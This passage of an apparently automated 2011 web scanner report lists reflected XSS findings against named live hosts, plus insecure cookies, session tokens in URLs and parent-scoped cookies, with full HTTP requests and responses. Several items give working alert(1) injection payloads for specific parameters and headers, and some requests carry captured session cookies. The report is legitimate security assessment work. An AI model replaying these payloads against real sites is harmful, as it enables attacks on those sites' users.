P3P: CP="NOI DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:17:07 GMT
Content-Length: 69

//alert('writeinfocapture65bd4<script>alert(1)</script>d76e4a52225');

2.5. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [vbrowser parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.websitealive5.com
Path:   /4405/operator/guest/gLogin_Server.asp

Issue detail

The value of the vbrowser request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 723f4'%3balert(1)//3785ea87a8a was submitted in the vbrowser parameter. This input was echoed as 723f4';alert(1)//3785ea87a8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4405/operator/guest/gLogin_Server.asp?groupid=4405&action=writeinfocapture&ismobile=False&vbrowser=other723f4'%3balert(1)//3785ea87a8a&skin_id=4621&infocapture_ids=&infocapture_values=&departmentid=5101 HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:17:10 GMT
Content-Length: 1044

//alert('writeinfocapture');
   document.getElementById("infocapturecontent").innerHTML = '<div class="general_text" style="margin-top:5px;">Phone Number</div><input type="hidden" name="i1" value="125"
...[SNIP]...
<input type="text" class="general_textbox plus_text_other723f4';alert(1)//3785ea87a8a" id="i_text1" name="i_text1" onfocus="style.borderColor=\'#FF9900\'" onblur="style.borderColor=\'#cccccc\'" style="width:75%;" value = "" onKeyPress="return checkEnter(event)">
...[SNIP]...

2.6. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [vbrowser parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.websitealive5.com
Path:   /4405/operator/guest/gLogin_Server.asp

Issue detail

The value of the vbrowser request parameter is copied into a JavaScript rest-of-line comment. The payload 8354b%0aalert(1)//0ce0b71cff9 was submitted in the vbrowser parameter. This input was echoed as 8354b
alert(1)//0ce0b71cff9
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4405/operator/guest/gLogin_Server.asp?groupid=4405&action=writeinfocapture&ismobile=False&vbrowser=other8354b%0aalert(1)//0ce0b71cff9&skin_id=4621&infocapture_ids=&infocapture_values=&departmentid=5101 HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:17:12 GMT
Content-Length: 1042

//alert('writeinfocapture');
   document.getElementById("infocapturecontent").innerHTML = '<div class="general_text" style="margin-top:5px;">Phone Number</div><input type="hidden" name="i1" value="125"
...[SNIP]...
<input type="text" class="general_textbox plus_text_other8354b
alert(1)//0ce0b71cff9
" id="i_text1" name="i_text1" onfocus="style.borderColor=\'#FF9900\'" onblur="style.borderColor=\'#cccccc\'" style="width:75%;" value = "" onKeyPress="return checkEnter(event)">
...[SNIP]...

2.7. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b41e5'-alert(1)-'1d0f52fc05b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b41e5'-alert(1)-'1d0f52fc05b

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jun 2011 15:19:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3686
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Db41e5%27%2Dalert%281%29%2D%271d0f52fc05b; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQQCBBCCB=IPDHGDPDGMCLEBHCBIOHDNJH; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<TITLE>Customer Service Solutions - LivePerson</title>
<META NAME="descripti
...[SNIP]...
<script language='javascript'>
   lpAddVars('visitor','Visitor+Referrer','http://www.google.com/search?hl=en&q=b41e5'-alert(1)-'1d0f52fc05b');
   lpAddVars('page','pageName','');
</script>
...[SNIP]...

3. SSL cookie without secure flag set
There are 3 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


3.1. https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://servicesales.sel.sony.com
Path:   /ecom/accessories/web/index.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ecom/accessories/web/index.jsp HTTP/1.1
Host: servicesales.sel.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:25 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001hzt8DTIMlpyDNOhXRLF_ba5:2TPPETS20Q; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: TSeca4d8=c2e2e546d60a79171a338a04613adb2bd67db16442c902964e03597d60ac0ec5c9f27c41; Path=/
Content-Length: 46207


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
   <title>Sony Parts and Accessories - Home</title>
   <meta http-equiv="
...[SNIP]...

3.2. https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sonyelectronicssupportus.112.2o7.net
Path:   /b/ss/esupport-sony-dev/1/H.10--NS/0

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/esupport-sony-dev/1/H.10--NS/0 HTTP/1.1
Host: sonyelectronicssupportus.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:27 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597F[CE]; Expires=Tue, 21 Jun 2016 15:19:27 GMT; Domain=.2o7.net; Path=/
Location: https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:27 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:27 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www495
Content-Length: 0
Content-Type: text/plain
Connection: close


3.3. https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sonysscom.112.2o7.net
Path:   /b/ss/sonysscom/1/H.8--NS/0

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/sonysscom/1/H.8--NS/0 HTTP/1.1
Host: sonysscom.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:28 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_zfgpzzjfd=[CS]v4|0-0|4E035980[CE]; Expires=Tue, 21 Jun 2016 15:19:28 GMT; Domain=.2o7.net; Path=/
Location: https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:28 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:28 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www430
Content-Length: 0
Content-Type: text/plain
Connection: close


4. Session token in URL
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://sales.liveperson.net/hc/71737897/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/71737897/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/71737897/?&visitor=16101514677756&msessionkey=4916265021794629949&site=71737897&cmd=mTagStartPage&lpCallId=641238012350-103325378382&protV=20&lpjson=1&page=http%3A//www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551&id=4900462531&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sonystyle-sales-general-english&activePlugin=none&cobrowse=true&PV%21unit=sonystyle-sales-general&PV%21visitorActive=1&SV%21language=english&title=Sony%20Store%20USA%20%7C%20Sony%20VAIO%AE%20Computers%20%7C%20Sony%20Consumer%20Electronics HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:58:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 23 Jun 2011 14:58:34 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"641238012350-103325378382","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

4.2. https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://servicesales.sel.sony.com
Path:   /ecom/accessories/web/index.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /ecom/accessories/web/index.jsp HTTP/1.1
Host: servicesales.sel.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:25 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001hzt8DTIMlpyDNOhXRLF_ba5:2TPPETS20Q; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: TSeca4d8=c2e2e546d60a79171a338a04613adb2bd67db16442c902964e03597d60ac0ec5c9f27c41; Path=/
Content-Length: 46207


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
   <title>Sony Parts and Accessories - Home</title>
   <meta http-equiv="
...[SNIP]...
<div class="order_icon"><a href='http://servicesales.sel.sony.com/ecom/accessories/web/trackOrder.do?operation=init&sessionId=hzt8DTIMlpyDNOhXRLF_ba5' target="_top"><img src="../graphics/site/order_status.jpg" border="0">
...[SNIP]...

4.3. https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.websitealive5.com
Path:   /4405/operator/guest/gDefault_v2.asp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion= HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: http://www.websitealive5.com/4405/rRouter.asp?groupid=4405&websiteid=150&departmentid=5101&dl=http%3A//www.omnitechsupport.com/about.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:16:28 GMT
Content-Length: 15042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...

5. Cookie scoped to parent domain
There are 8 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


5.1. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:48 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6il6pfh1t07e7jh9gcmfdeis73; expires=Sat, 16-Jul-2011 18:53:08 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 23 Jun 2011 15:16:06 GMT
ETag: "73be9325b7928055d2f550e7dc22f698"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

5.2. http://solutions.liveperson.com/ref/lppb.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 23 Jun 2011 15:19:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: pbl.asp
Content-Length: 128
Content-Type: text/html
Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQQCBBCCB=EODHGDPDEDEKKABJJNKILEHB; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>

5.3. http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sonyelectronicssupportus.112.2o7.net
Path:   /b/ss/esupport-sony-dev/1/H.10--NS/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/esupport-sony-dev/1/H.10--NS/0 HTTP/1.1
Host: sonyelectronicssupportus.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:26 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597E[CE]; Expires=Tue, 21 Jun 2016 15:19:26 GMT; Domain=.2o7.net; Path=/
Location: http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:26 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www495
Content-Length: 0
Content-Type: text/plain
Connection: close


5.4. https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sonyelectronicssupportus.112.2o7.net
Path:   /b/ss/esupport-sony-dev/1/H.10--NS/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/esupport-sony-dev/1/H.10--NS/0 HTTP/1.1
Host: sonyelectronicssupportus.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:27 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597F[CE]; Expires=Tue, 21 Jun 2016 15:19:27 GMT; Domain=.2o7.net; Path=/
Location: https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:27 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:27 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www495
Content-Length: 0
Content-Type: text/plain
Connection: close


5.5. https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sonysscom.112.2o7.net
Path:   /b/ss/sonysscom/1/H.8--NS/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/sonysscom/1/H.8--NS/0 HTTP/1.1
Host: sonysscom.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:28 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_zfgpzzjfd=[CS]v4|0-0|4E035980[CE]; Expires=Tue, 21 Jun 2016 15:19:28 GMT; Domain=.2o7.net; Path=/
Location: https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:28 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:28 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www430
Content-Length: 0
Content-Type: text/plain
Connection: close


5.6. http://www.facebook.com/sonyelectronics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sonyelectronics

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sonyelectronics HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=jVkDTsgSBkZEpRPRjIw6e36G; expires=Sat, 22-Jun-2013 15:19:41 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=rLE1G; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.37
Connection: close
Date: Thu, 23 Jun 2011 15:19:41 GMT
Content-Length: 169018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema
...[SNIP]...

5.7. http://www.flickr.com/groups/sonycameraclub

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /groups/sonycameraclub HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
